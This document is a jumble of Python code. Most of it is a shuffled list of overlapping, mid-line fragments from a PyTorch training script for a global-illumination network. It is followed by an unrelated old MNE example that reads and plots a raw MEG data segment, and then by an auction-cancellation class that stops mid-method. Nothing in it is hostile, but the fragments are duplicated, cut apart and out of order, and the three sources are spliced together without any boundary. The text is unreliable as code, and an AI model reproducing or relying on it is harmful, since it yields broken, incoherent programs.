"the network parser.add_argument('--isFineTune', action = 'store_true', help='whether to fine-tune the network or not')",
"not opt.cuda: print(\"WARNING: You have a CUDA device, so you should probably run",
"np.mean(globalIllu3ErrsNpList[j-999:j+1, :], axis=0), trainingLog, epoch, j) if j == 1 or j ==",
"j) ) vutils.save_image( ( ( 0.5*(imP3Batch + 1)*segBatch.expand_as(imP3Batch))**(1.0/2.2) ).data , '{0}/{1}_imP3.png'.format(opt.experiment, j) )",
"opGlobalIllu1to2 = optim.Adam(globIllu1to2.parameters(), lr=2e-4, betas=(0.5, 0.999) ) opGlobalIllu2to3 = optim.Adam(globIllu2to3.parameters(), lr=2e-4, betas=(0.5, 0.999)",
"import os import models import torchvision.utils as vutils import utils import dataLoader from",
"help='how many levels of cascades should we use') opt = parser.parse_args() print(opt) assert(opt.cascadeLevel
"import random import os import models import torchvision.utils as vutils import utils import",
"opt.imageSize, opt.imageSize) ) depthBatch = Variable(torch.FloatTensor(opt.batchSize, 1, opt.imageSize, opt.imageSize) ) imP1Batch = Variable(torch.FloatTensor(opt.batchSize,",
"roughBatch = roughBatch.cuda(opt.gpuId) depthBatch = depthBatch.cuda(opt.gpuId) segBatch = segBatch.cuda(opt.gpuId) imP1Batch = imP1Batch.cuda(opt.gpuId) imP2Batch",
"opt.deviceIds[0] opt.seed = random.randint(1, 10000) print(\"Random Seed: \", opt.seed) random.seed(opt.seed) torch.manual_seed(opt.seed) if torch.cuda.is_available()",
"np.ones( [1, 1+opt.cascadeLevel], dtype = np.float32) for epoch in list(range(opt.epochId+1, opt.nepoch) ): trainingLog",
"j) ) vutils.save_image( (0.5*(roughBatch + 1)*segBatch.expand_as(roughBatch) ).data, '{0}/{1}_roughGt.png'.format(opt.experiment, j) ) depthOut = 1",
") / pixelNum / 3.0 ) globalIllu2ErrSum = sum(globalIllu2Errs) globalIllu3ErrSum = sum(globalIllu3Errs) totalErr",
"type=float, default=1, help='the weight of global illumination prediction 3') # Fine Tune the",
"globalIllu2 = globIllu1to2(inputGlob2) globalIllu2s.append(globalIllu2 ) inputGlob3 = torch.cat([globalIllu2s[n], albedoBatch, normalBatch, roughBatch, depthBatch, segBatch],",
"globIllu1to2.load_state_dict(torch.load('{0}/globIllu1to2_{1}.pth'.format(opt.experiment, opt.epochId) ) ) globIllu2to3.load_state_dict(torch.load('{0}/globIllu2to3_{1}.pth'.format(opt.experiment, opt.epochId) ) ) ############## ###################### # Send things",
"0: for param_group in opGlobalIllu1to2.param_groups: param_group['lr'] /= 2 for param_group in opGlobalIllu2to3.param_groups: param_group['lr']",
"segBatch.data.resize_(seg_cpu.shape) segBatch.data.copy_(seg_cpu ) depth_cpu = dataBatch['depth'] depthBatch.data.resize_(depth_cpu.shape) depthBatch.data.copy_(depth_cpu ) imP1_cpu = dataBatch['imP1'] imP1Batch.data.resize_(imP1_cpu.shape)",
"optim import argparse import random import os import models import torchvision.utils as vutils",
"= np.ones( [1, 1+opt.cascadeLevel], dtype = np.float32) for epoch in list(range(opt.epochId+1, opt.nepoch) ):",
"to gpu albedo_cpu = dataBatch['albedo'] albedoBatch.data.resize_(albedo_cpu.shape) albedoBatch.data.copy_(albedo_cpu ) normal_cpu = dataBatch['normal'] normalBatch.data.resize_(normal_cpu.shape) normalBatch.data.copy_(normal_cpu",
") vutils.save_image( ( ( 0.5*(imP2Batch + 1)*segBatch.expand_as(imP2Batch))**(1.0/2.2) ).data , '{0}/{1}_imP2.png'.format(opt.experiment, j) ) vutils.save_image(",
"np.concatenate( [globalIllu2ErrsNpList, utils.turnErrorIntoNumpy(globalIllu2Errs)], axis=0) globalIllu3ErrsNpList = np.concatenate( [globalIllu3ErrsNpList, utils.turnErrorIntoNumpy(globalIllu3Errs)], axis=0) if j <",
"predicted results for n in range(0, opt.cascadeLevel + 1): vutils.save_image( ( ( 0.5*(globalIllu2s[n]",
":], axis=0), trainingLog, epoch, j) else: utils.writeNpErrToScreen('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[j-999:j+1, :], axis=0), epoch, j) utils.writeNpErrToScreen('globalIllu3_Accu',",
"( ( 0.5*(imP1Batch + 1)*segBatch.expand_as(imP1Batch))**(1.0/2.2) ).data , '{0}/{1}_imP1.png'.format(opt.experiment, j) ) vutils.save_image( ( (",
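Predictions live in [-1, 1], so the save path maps them to [0, 1], applies the segmentation mask, and raises to 1/2.2 for display gamma. A runnable sketch of that ( 0.5*(im + 1)*seg )**(1.0/2.2) pattern; the tensors and filename are fabricated for the demo:

    import torch
    import torchvision.utils as vutils

    img = torch.rand(4, 3, 64, 64) * 2 - 1  # network output range [-1, 1]
    seg = torch.ones(4, 3, 64, 64)          # all-valid mask for the demo
    vutils.save_image((0.5 * (img + 1) * seg) ** (1.0 / 2.2), 'imP1_demo.png')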
"torch.sum(segBatch ).cpu().data.item() for m in range(0, n + 1): globalIllu2Errs.append( torch.sum( (globalIllu2s[m] -",
"1)*segBatch.expand_as(imP3Batch) )**(1.0/2.2) ).data, '{0}/{1}_imP3Pred_{2}.png'.format(opt.experiment, j, n) ) trainingLog.close() # Update the training rate",
"training epoch of the network') # The detail network setting parser.add_argument('--cascadeLevel', type=int, default=0,",
"[1, 1+opt.cascadeLevel], dtype = np.float32) globalIllu2ErrsNpList = np.ones( [1, 1+opt.cascadeLevel], dtype = np.float32)",
"help='the gpus used for training network') # The training weight parser.add_argument('--globalIllu2', type=float, default=1,",
"illumination prediction 2') parser.add_argument('--globalIllu3', type=float, default=1, help='the weight of global illumination prediction 3')",
"torch.sum( (globalIllu2s[m] - imP2Batch) * (globalIllu2s[m] - imP2Batch) * segBatch.expand_as(imP2Batch) ) / pixelNum",
"axis=0) globalIllu3ErrsNpList = np.concatenate( [globalIllu3ErrsNpList, utils.turnErrorIntoNumpy(globalIllu3Errs)], axis=0) if j < 1000: utils.writeNpErrToScreen('globalIllu2_Accu:', np.mean(globalIllu2ErrsNpList[1:j+1,",
"vutils.save_image( ( ( 0.5*(imP1Batch + 1)*segBatch.expand_as(imP1Batch))**(1.0/2.2) ).data , '{0}/{1}_imP1.png'.format(opt.experiment, j) ) vutils.save_image( (",
"j) ) vutils.save_image( (0.5*(normalBatch + 1)*segBatch.expand_as(normalBatch) ).data, '{0}/{1}_normalGt.png'.format(opt.experiment, j) ) vutils.save_image( (0.5*(roughBatch +",
") inputGlob3 = torch.cat([globalIllu2s[n], albedoBatch, normalBatch, roughBatch, depthBatch, segBatch], dim=1) globalIllu3 = globIllu2to3(inputGlob3.detach()",
"the training rate if (epoch + 1) % 2 == 0: for param_group",
"np.save('{0}/globalIllu2_{1}.npy'.format(opt.experiment, epoch), globalIllu2ErrsNpList ) np.save('{0}/globalIllu3_{1}.npy'.format(opt.experiment, epoch), globalIllu3ErrsNpList ) torch.save(globIllu1to2.state_dict(), '{0}/globIllu1to2_{1}.pth'.format(opt.experiment, epoch) ) torch.save(globIllu2to3.state_dict(),",
"j) utils.writeNpErrToFile('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[j-999:j+1, :], axis=0), trainingLog, epoch, j) if j == 1 or",
"brdfLoader = DataLoader(brdfDataset, batch_size = opt.batchSize, num_workers = 8, shuffle = False) j",
"= argparse.ArgumentParser() # The locationi of training set parser.add_argument('--dataRoot', default='/home/zhl/SiggraphAsia18/Data/train/', help='path to images')",
"(globalIllu2s[m] - imP2Batch) * segBatch.expand_as(imP2Batch) ) / pixelNum / 3.0 ) globalIllu3Errs.append(torch.sum( (globalIllu3s[m]",
"help='the training epoch of the network') # The detail network setting parser.add_argument('--cascadeLevel', type=int,",
").data, '{0}/{1}_roughGt.png'.format(opt.experiment, j) ) depthOut = 1 / torch.clamp(depthBatch, 1e-6, 10) * segBatch.expand_as(depthBatch)",
"j) ) # Save the predicted results for n in range(0, opt.cascadeLevel +",
"# Save the predicted results for n in range(0, opt.cascadeLevel + 1): vutils.save_image(",
"axis=0), trainingLog, epoch, j) utils.writeNpErrToFile('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[j-999:j+1, :], axis=0), trainingLog, epoch, j) if j",
"prediction 2') parser.add_argument('--globalIllu3', type=float, default=1, help='the weight of global illumination prediction 3') #",
"training error utils.writeErrToScreen('globalIllu2', globalIllu2Errs, epoch, j) utils.writeErrToScreen('globalIllu3', globalIllu3Errs, epoch, j) utils.writeErrToFile('globalIllu2', globalIllu2Errs, trainingLog,",
"= np.concatenate( [globalIllu3ErrsNpList, utils.turnErrorIntoNumpy(globalIllu3Errs)], axis=0) if j < 1000: utils.writeNpErrToScreen('globalIllu2_Accu:', np.mean(globalIllu2ErrsNpList[1:j+1, :], axis=0),",
") vutils.save_image( (0.5*(roughBatch + 1)*segBatch.expand_as(roughBatch) ).data, '{0}/{1}_roughGt.png'.format(opt.experiment, j) ) depthOut = 1 /",
"albedoBatch, normalBatch, roughBatch, depthBatch, segBatch], dim=1) globalIllu3 = globIllu2to3(inputGlob3.detach() ) globalIllu3s.append(globalIllu3) ######################################################## globalIllu2Errs",
"segBatch.expand_as(imP2Batch) ) / pixelNum / 3.0 ) globalIllu3Errs.append(torch.sum( (globalIllu3s[m] - imP3Batch) * (globalIllu3s[m]",
"depthOut = 1 / torch.clamp(depthBatch, 1e-6, 10) * segBatch.expand_as(depthBatch) depthOut = (depthOut -",
"parser.add_argument('--globalIllu3', type=float, default=1, help='the weight of global illumination prediction 3') # Fine Tune",
":], axis=0), trainingLog, epoch, j) if j == 1 or j == 1000",
"Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) roughBatch = Variable(torch.FloatTensor(opt.batchSize, 1, opt.imageSize, opt.imageSize) ) segBatch",
"0 ) if opt.experiment is None: opt.experiment = 'check_globalillumination' os.system('mkdir {0}'.format(opt.experiment) ) os.system('cp",
"globalIllu2Errs.append( torch.sum( (globalIllu2s[m] - imP2Batch) * (globalIllu2s[m] - imP2Batch) * segBatch.expand_as(imP2Batch) ) /",
"epoch, j) utils.writeNpErrToFile('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[j-999:j+1, :], axis=0), trainingLog, epoch, j) if j == 1",
"print(opt) assert(opt.cascadeLevel == 0 ) if opt.experiment is None: opt.experiment = 'check_globalillumination' os.system('mkdir",
"range(0, opt.cascadeLevel + 1): vutils.save_image( ( ( 0.5*(globalIllu2s[n] + 1)*segBatch.expand_as(imP2Batch) )**(1.0/2.2) ).data, '{0}/{1}_imP2Pred_{2}.png'.format(opt.experiment,",
"import torchvision.utils as vutils import utils import dataLoader from torch.utils.data import DataLoader parser",
"imP2_cpu = dataBatch['imP2'] imP2Batch.data.resize_(imP2_cpu.shape) imP2Batch.data.copy_(imP2_cpu ) imP3_cpu = dataBatch['imP3'] imP3Batch.data.resize_(imP3_cpu.shape) imP3Batch.data.copy_(imP3_cpu ) opGlobalIllu1to2.zero_grad()",
"( ( 0.5*(globalIllu3s[n] + 1)*segBatch.expand_as(imP3Batch) )**(1.0/2.2) ).data, '{0}/{1}_imP3Pred_{2}.png'.format(opt.experiment, j, n) ) trainingLog.close() #",
"2 np.save('{0}/globalIllu2_{1}.npy'.format(opt.experiment, epoch), globalIllu2ErrsNpList ) np.save('{0}/globalIllu3_{1}.npy'.format(opt.experiment, epoch), globalIllu3ErrsNpList ) torch.save(globIllu1to2.state_dict(), '{0}/globIllu1to2_{1}.pth'.format(opt.experiment, epoch) )",
"default=16, help='input batch size') parser.add_argument('--imageSize', type=int, default=256, help='the height / width of the",
"= globIllu1to2(inputGlob2) globalIllu2s.append(globalIllu2 ) inputGlob3 = torch.cat([globalIllu2s[n], albedoBatch, normalBatch, roughBatch, depthBatch, segBatch], dim=1)",
"models import torchvision.utils as vutils import utils import dataLoader from torch.utils.data import DataLoader",
"##################################### #################################### brdfDataset = dataLoader.BatchLoader(opt.dataRoot, imSize = opt.imageSize) brdfLoader = DataLoader(brdfDataset, batch_size =",
"vutils.save_image( ( ( 0.5*(globalIllu2s[n] + 1)*segBatch.expand_as(imP2Batch) )**(1.0/2.2) ).data, '{0}/{1}_imP2Pred_{2}.png'.format(opt.experiment, j, n) ) vutils.save_image(",
"imP2Batch = imP2Batch.cuda(opt.gpuId) imP3Batch = imP3Batch.cuda(opt.gpuId) globIllu1to2 = globIllu1to2.cuda(opt.gpuId) globIllu2to3 = globIllu2to3.cuda(opt.gpuId) ####################################",
") ##################################### #################################### brdfDataset = dataLoader.BatchLoader(opt.dataRoot, imSize = opt.imageSize) brdfLoader = DataLoader(brdfDataset, batch_size",
"depthBatch, segBatch], dim=1) globalIllu3 = globIllu2to3(inputGlob3.detach() ) globalIllu3s.append(globalIllu3) ######################################################## globalIllu2Errs = [] globalIllu3Errs",
"% 2 == 0: for param_group in opGlobalIllu1to2.param_groups: param_group['lr'] /= 2 for param_group",
"and the input vutils.save_image( (0.5*(albedoBatch + 1)*segBatch.expand_as(albedoBatch) ).data, '{0}/{1}_albedoGt.png'.format(opt.experiment, j) ) vutils.save_image( (0.5*(normalBatch",
"= segBatch.cuda(opt.gpuId) imP1Batch = imP1Batch.cuda(opt.gpuId) imP2Batch = imP2Batch.cuda(opt.gpuId) imP3Batch = imP3Batch.cuda(opt.gpuId) globIllu1to2 =",
"training setting parser.add_argument('--nepoch', type=int, default=18, help='the number of epochs for training') parser.add_argument('--batchSize', type=int,",
"- 0.25) /0.8 vutils.save_image( ( depthOut*segBatch.expand_as(depthBatch) ).data, '{0}/{1}_depthGt.png'.format(opt.experiment, j) ) vutils.save_image( ( (",
"segBatch.expand_as(imP3Batch) ) / pixelNum / 3.0 ) globalIllu2ErrSum = sum(globalIllu2Errs) globalIllu3ErrSum = sum(globalIllu3Errs)",
"np from torch.autograd import Variable import torch.optim as optim import argparse import random",
"opGlobalIllu2to3 = optim.Adam(globIllu2to3.parameters(), lr=2e-4, betas=(0.5, 0.999) ) ##################################### #################################### brdfDataset = dataLoader.BatchLoader(opt.dataRoot, imSize",
"0.5*(imP2Batch + 1)*segBatch.expand_as(imP2Batch))**(1.0/2.2) ).data , '{0}/{1}_imP2.png'.format(opt.experiment, j) ) vutils.save_image( ( ( 0.5*(imP3Batch +",
"dataLoader from torch.utils.data import DataLoader parser = argparse.ArgumentParser() # The locationi of training",
"opt.gpuId = opt.deviceIds[0] opt.seed = random.randint(1, 10000) print(\"Random Seed: \", opt.seed) random.seed(opt.seed) torch.manual_seed(opt.seed)",
"# initalize tensors albedoBatch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) normalBatch = Variable(torch.FloatTensor(opt.batchSize,",
"much level of cascades should we use') opt = parser.parse_args() print(opt) assert(opt.cascadeLevel ==",
"detail network setting parser.add_argument('--cascadeLevel', type=int, default=0, help='how much level of cascades should we",
"roughBatch.data.copy_(rough_cpu ) seg_cpu = dataBatch['seg'] segBatch.data.resize_(seg_cpu.shape) segBatch.data.copy_(seg_cpu ) depth_cpu = dataBatch['depth'] depthBatch.data.resize_(depth_cpu.shape) depthBatch.data.copy_(depth_cpu",
"the predicted results for n in range(0, opt.cascadeLevel + 1): vutils.save_image( ( (",
"if opt.cuda: albedoBatch = albedoBatch.cuda(opt.gpuId) normalBatch = normalBatch.cuda(opt.gpuId) roughBatch = roughBatch.cuda(opt.gpuId) depthBatch =",
"= optim.Adam(globIllu1to2.parameters(), lr=2e-4, betas=(0.5, 0.999) ) opGlobalIllu2to3 = optim.Adam(globIllu2to3.parameters(), lr=2e-4, betas=(0.5, 0.999) )",
"= np.ones( [1, 1+opt.cascadeLevel], dtype = np.float32) globalIllu3ErrsNpList= np.ones( [1, 1+opt.cascadeLevel], dtype =",
"1, opt.imageSize, opt.imageSize) ) imP1Batch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) imP2Batch =",
"imP2Batch.data.copy_(imP2_cpu ) imP3_cpu = dataBatch['imP3'] imP3Batch.data.resize_(imP3_cpu.shape) imP3Batch.data.copy_(imP3_cpu ) opGlobalIllu1to2.zero_grad() opGlobalIllu2to3.zero_grad() ######################################################## # Build",
"training rate if (epoch + 1) % 2 == 0: for param_group in",
"CUDA device, so you should probably run with --cuda\") #################################### # initalize tensors",
"utils.writeNpErrToScreen('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[j-999:j+1, :], axis=0), epoch, j) utils.writeNpErrToScreen('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[j-999:j+1, :], axis=0), epoch, j) utils.writeNpErrToFile('globalIllu2_Accu',",
"store samples and models') # The basic training setting parser.add_argument('--nepoch', type=int, default=18, help='the",
"for training') parser.add_argument('--batchSize', type=int, default=16, help='input batch size') parser.add_argument('--imageSize', type=int, default=256, help='the height",
"j) ) vutils.save_image( ( ( 0.5*(imP1Batch + 1)*segBatch.expand_as(imP1Batch))**(1.0/2.2) ).data , '{0}/{1}_imP1.png'.format(opt.experiment, j) )",
"depthBatch = depthBatch.cuda(opt.gpuId) segBatch = segBatch.cuda(opt.gpuId) imP1Batch = imP1Batch.cuda(opt.gpuId) imP2Batch = imP2Batch.cuda(opt.gpuId) imP3Batch",
"1000: utils.writeNpErrToScreen('globalIllu2_Accu:', np.mean(globalIllu2ErrsNpList[1:j+1, :], axis=0), epoch, j) utils.writeNpErrToScreen('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[1:j+1, :], axis=0), epoch, j)",
"= dataBatch['imP3'] imP3Batch.data.resize_(imP3_cpu.shape) imP3Batch.data.copy_(imP3_cpu ) opGlobalIllu1to2.zero_grad() opGlobalIllu2to3.zero_grad() ######################################################## # Build the cascade network",
"globIllu2to3 = models.globalIllumination() ######################################### if opt.isFineTune: globIllu1to2.load_state_dict(torch.load('{0}/globIllu1to2_{1}.pth'.format(opt.experiment, opt.epochId) ) ) globIllu2to3.load_state_dict(torch.load('{0}/globIllu2to3_{1}.pth'.format(opt.experiment, opt.epochId) )",
"type=int, default = -1, help='the training epoch of the network') # The detail",
"= opt.deviceIds[0] opt.seed = random.randint(1, 10000) print(\"Random Seed: \", opt.seed) random.seed(opt.seed) torch.manual_seed(opt.seed) if",
"segBatch.data.copy_(seg_cpu ) depth_cpu = dataBatch['depth'] depthBatch.data.resize_(depth_cpu.shape) depthBatch.data.copy_(depth_cpu ) imP1_cpu = dataBatch['imP1'] imP1Batch.data.resize_(imP1_cpu.shape) imP1Batch.data.copy_(imP1_cpu",
"globalIllu3ErrsNpList= np.ones( [1, 1+opt.cascadeLevel], dtype = np.float32) renderedErrsNpList = np.ones( [1, 1+opt.cascadeLevel], dtype",
"os import models import torchvision.utils as vutils import utils import dataLoader from torch.utils.data",
"1)*segBatch.expand_as(imP3Batch))**(1.0/2.2) ).data , '{0}/{1}_imP3.png'.format(opt.experiment, j) ) # Save the predicted results for n",
"# globalIllu2s = [] globalIllu3s = [] n = 0 inputGlob2 = torch.cat([imP1Batch,",
"utils.writeNpErrToFile('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[j-999:j+1, :], axis=0), trainingLog, epoch, j) utils.writeNpErrToFile('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[j-999:j+1, :], axis=0), trainingLog, epoch,",
"[] globalIllu3s = [] n = 0 inputGlob2 = torch.cat([imP1Batch, albedoBatch, normalBatch, roughBatch,",
"/= 2 for param_group in opGlobalIllu2to3.param_groups: param_group['lr'] /= 2 np.save('{0}/globalIllu2_{1}.npy'.format(opt.experiment, epoch), globalIllu2ErrsNpList )",
"opt.imageSize, opt.imageSize) ) imP1Batch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) imP2Batch = Variable(torch.FloatTensor(opt.batchSize,",
"use') opt = parser.parse_args() print(opt) assert(opt.cascadeLevel == 0 ) if opt.experiment is None:",
"n) ) vutils.save_image( ( ( 0.5*(globalIllu3s[n] + 1)*segBatch.expand_as(imP3Batch) )**(1.0/2.2) ).data, '{0}/{1}_imP3Pred_{2}.png'.format(opt.experiment, j, n)",
"np.mean(globalIllu3ErrsNpList[1:j+1, :], axis=0), trainingLog, epoch, j) else: utils.writeNpErrToScreen('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[j-999:j+1, :], axis=0), epoch, j)",
"0 inputGlob2 = torch.cat([imP1Batch, albedoBatch, normalBatch, roughBatch, depthBatch, segBatch], dim=1) globalIllu2 = globIllu1to2(inputGlob2)",
"# Global Optimier opGlobalIllu1to2 = optim.Adam(globIllu1to2.parameters(), lr=2e-4, betas=(0.5, 0.999) ) opGlobalIllu2to3 = optim.Adam(globIllu2to3.parameters(),",
"(globalIllu3s[m] - imP3Batch) * (globalIllu3s[m] - imP3Batch) * segBatch.expand_as(imP3Batch) ) / pixelNum /",
"GPU if opt.cuda: albedoBatch = albedoBatch.cuda(opt.gpuId) normalBatch = normalBatch.cuda(opt.gpuId) roughBatch = roughBatch.cuda(opt.gpuId) depthBatch",
"image to network') parser.add_argument('--cuda', action='store_true', help='enables cuda') parser.add_argument('--deviceIds', type=int, nargs='+', default=[0], help='the gpus",
"[] globalIllu3Errs = [] pixelNum = torch.sum(segBatch ).cpu().data.item() for m in range(0, n",
"+ 1): globalIllu2Errs.append( torch.sum( (globalIllu2s[m] - imP2Batch) * (globalIllu2s[m] - imP2Batch) * segBatch.expand_as(imP2Batch)",
"= [] pixelNum = torch.sum(segBatch ).cpu().data.item() for m in range(0, n + 1):",
"Update the training rate if (epoch + 1) % 2 == 0: for",
"of epochs for training') parser.add_argument('--batchSize', type=int, default=16, help='input batch size') parser.add_argument('--imageSize', type=int, default=256,",
"dim=1) globalIllu3 = globIllu2to3(inputGlob3.detach() ) globalIllu3s.append(globalIllu3) ######################################################## globalIllu2Errs = [] globalIllu3Errs = []",
") rough_cpu = dataBatch['rough'] roughBatch.data.resize_(rough_cpu.shape) roughBatch.data.copy_(rough_cpu ) seg_cpu = dataBatch['seg'] segBatch.data.resize_(seg_cpu.shape) segBatch.data.copy_(seg_cpu )",
"Variable import torch.optim as optim import argparse import random import os import models",
"help='the path to store samples and models') # The basic training setting parser.add_argument('--nepoch',",
"list(range(opt.epochId+1, opt.nepoch) ): trainingLog = open('{0}/trainingLog_{1}.txt'.format(opt.experiment, epoch), 'w') for i, dataBatch in enumerate(brdfLoader):",
"torch.clamp(depthBatch, 1e-6, 10) * segBatch.expand_as(depthBatch) depthOut = (depthOut - 0.25) /0.8 vutils.save_image( (",
"0.5*(imP1Batch + 1)*segBatch.expand_as(imP1Batch))**(1.0/2.2) ).data , '{0}/{1}_imP1.png'.format(opt.experiment, j) ) vutils.save_image( ( ( 0.5*(imP2Batch +",
") ) ############## ###################### # Send things into GPU if opt.cuda: albedoBatch =",
"trainingLog, epoch, j) if j == 1 or j == 1000 or j%",
"vutils.save_image( (0.5*(normalBatch + 1)*segBatch.expand_as(normalBatch) ).data, '{0}/{1}_normalGt.png'.format(opt.experiment, j) ) vutils.save_image( (0.5*(roughBatch + 1)*segBatch.expand_as(roughBatch) ).data,",
"as vutils import utils import dataLoader from torch.utils.data import DataLoader parser = argparse.ArgumentParser()",
"Seed: \", opt.seed) random.seed(opt.seed) torch.manual_seed(opt.seed) if torch.cuda.is_available() and not opt.cuda: print(\"WARNING: You have",
"type=int, default=256, help='the height / width of the input image to network') parser.add_argument('--cuda',",
"nargs='+', default=[0], help='the gpus used for training network') # The training weight parser.add_argument('--globalIllu2',",
"globIllu1to2 = models.globalIllumination() globIllu2to3 = models.globalIllumination() ######################################### if opt.isFineTune: globIllu1to2.load_state_dict(torch.load('{0}/globIllu1to2_{1}.pth'.format(opt.experiment, opt.epochId) ) )",
"imP2Batch.cuda(opt.gpuId) imP3Batch = imP3Batch.cuda(opt.gpuId) globIllu1to2 = globIllu1to2.cuda(opt.gpuId) globIllu2to3 = globIllu2to3.cuda(opt.gpuId) #################################### #################################### #",
").cpu().data.item() for m in range(0, n + 1): globalIllu2Errs.append( torch.sum( (globalIllu2s[m] - imP2Batch)",
"number of epochs for training') parser.add_argument('--batchSize', type=int, default=16, help='input batch size') parser.add_argument('--imageSize', type=int,",
"help='the weight of global illumination prediction 2') parser.add_argument('--globalIllu3', type=float, default=1, help='the weight of",
"batch_size = opt.batchSize, num_workers = 8, shuffle = False) j = 0 globalIllu1ErrsNpList=",
"# The basic training setting parser.add_argument('--nepoch', type=int, default=18, help='the number of epochs for",
"Variable(torch.FloatTensor(opt.batchSize, 1, opt.imageSize, opt.imageSize) ) segBatch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) depthBatch",
"Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) normalBatch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) roughBatch",
"np.float32) renderedErrsNpList = np.ones( [1, 1+opt.cascadeLevel], dtype = np.float32) for epoch in list(range(opt.epochId+1,",
"globIllu2to3(inputGlob3.detach() ) globalIllu3s.append(globalIllu3) ######################################################## globalIllu2Errs = [] globalIllu3Errs = [] pixelNum = torch.sum(segBatch",
"- imP3Batch) * segBatch.expand_as(imP3Batch) ) / pixelNum / 3.0 ) globalIllu2ErrSum = sum(globalIllu2Errs)",
"weight parser.add_argument('--globalIllu2', type=float, default=1, help='the weight of global illumination prediction 2') parser.add_argument('--globalIllu3', type=float,",
"dataBatch in enumerate(brdfLoader): j += 1 # Load data from cpu to gpu",
"roughBatch, depthBatch, segBatch], dim=1) globalIllu2 = globIllu1to2(inputGlob2) globalIllu2s.append(globalIllu2 ) inputGlob3 = torch.cat([globalIllu2s[n], albedoBatch,",
"= Variable(torch.FloatTensor(opt.batchSize, 1, opt.imageSize, opt.imageSize) ) segBatch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) )",
"or j == 1000 or j% 2000 == 0: # Save the ground",
"torch.autograd import Variable import torch.optim as optim import argparse import random import os",
"in opGlobalIllu2to3.param_groups: param_group['lr'] /= 2 np.save('{0}/globalIllu2_{1}.npy'.format(opt.experiment, epoch), globalIllu2ErrsNpList ) np.save('{0}/globalIllu3_{1}.npy'.format(opt.experiment, epoch), globalIllu3ErrsNpList )",
"dataBatch['rough'] roughBatch.data.resize_(rough_cpu.shape) roughBatch.data.copy_(rough_cpu ) seg_cpu = dataBatch['seg'] segBatch.data.resize_(seg_cpu.shape) segBatch.data.copy_(seg_cpu ) depth_cpu = dataBatch['depth']",
"type=int, default=16, help='input batch size') parser.add_argument('--imageSize', type=int, default=256, help='the height / width of",
"opt.batchSize, num_workers = 8, shuffle = False) j = 0 globalIllu1ErrsNpList= np.ones( [1,"
] |
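The staging code above predates PyTorch 1.0: `Variable` wrappers and the `resize_`/`copy_` pattern were how pre-allocated GPU buffers were refilled each iteration. For comparison, here is a minimal sketch of the same CPU-to-GPU staging in current PyTorch, assuming the same `dataBatch` dictionary layout; `stage_batch` is an illustrative name, not part of the original script.

import torch

device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')

def stage_batch(dataBatch, device):
    # Move every map in the batch onto the training device; no Variable
    # wrapper or resize_/copy_ staging is needed in PyTorch >= 1.0.
    keys = ['albedo', 'normal', 'rough', 'seg', 'depth', 'imP1', 'imP2', 'imP3']
    return {k: dataBatch[k].to(device, non_blocking=True) for k in keys}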
"""
==========================
Reading a raw file segment
==========================
"""
# Author: <NAME> <<EMAIL>>
#
# License: BSD (3-clause)

print __doc__

import os
from mne import fiff

fname = os.environ['MNE_SAMPLE_DATASET_PATH']
fname += '/MEG/sample/sample_audvis_raw.fif'

raw = fiff.setup_read_raw(fname)

exclude = ['MEG 2443', 'EEG 053']  # bad channels
meg_channels_idx = fiff.pick_types(raw['info'], meg=True, exclude=exclude)
meg_channels_idx = meg_channels_idx[:5]  # take 5 first

start, stop = raw.time_to_index(100, 115)  # 100 s to 115 s data segment
data, times = raw[meg_channels_idx, start:stop]
# data, times = raw[:, start:stop]  # read all channels

raw.close()

###############################################################################
# Show MEG data
import pylab as pl
pl.close('all')
pl.plot(times, data.T)
pl.xlabel('time (s)')
pl.ylabel('MEG data (T)')
pl.show()
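This example targets the early, pre-1.0 mne-python API (`fiff.setup_read_raw`, `raw.time_to_index`) and Python 2. A sketch of the same segment read against the current API follows; the environment-variable path is kept from the example above, and everything else is standard `mne` and `matplotlib`.

import os
import mne
import matplotlib.pyplot as plt

# Read the same 100 s to 115 s segment of the first five MEG channels.
fname = os.path.join(os.environ['MNE_SAMPLE_DATASET_PATH'],
                     'MEG', 'sample', 'sample_audvis_raw.fif')
raw = mne.io.read_raw_fif(fname)
picks = mne.pick_types(raw.info, meg=True, exclude=['MEG 2443', 'EEG 053'])[:5]
start, stop = raw.time_as_index([100, 115])
data, times = raw[picks, start:stop]

plt.plot(times, data.T)
plt.xlabel('time (s)')
plt.ylabel('MEG data (T)')
plt.show()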
# --- openprocurement.auctions.geb: cancellation activation action ---
from openprocurement.auctions.core.utils import (
    log_auction_status_change
)
from openprocurement.auctions.geb.constants import (
    AUCTION_STATUSES_FOR_CLEAN_BIDS_IN_CANCELLATION
)
from openprocurement.auctions.geb.managers.changers.base import (
    BaseAction
)


class CancellationActivationAction(BaseAction):
    """Cancellation activation action.

    When the auction owner activates a cancellation (patches its status
    to 'active'):
    - auction.status is set to 'cancelled'
    - if the procedure is in one of the statuses ['active.tendering',
      'active.enquiry', 'active.auction'], all bids are deleted
    """
    validators = []

    @classmethod
    def demand(cls, request, context):
        """Constructor method.

        If this request is the trigger for the action, return the
        Action class.
        """
        # check if the patch is activating a cancellation
        new_status = request.validated['json_data'].get('status')
        if context.status == 'pending' and new_status == 'active':
            return cls
        return False

    def act(self):
        auction = self.request.auction
        # set the auction status to cancelled
        status = 'cancelled'
        auction.status = status
        log_auction_status_change(self.request, self.context, status)

        # clean bids after the cancellation procedure
        auction_status = self.request.validated['auction_src']['status']
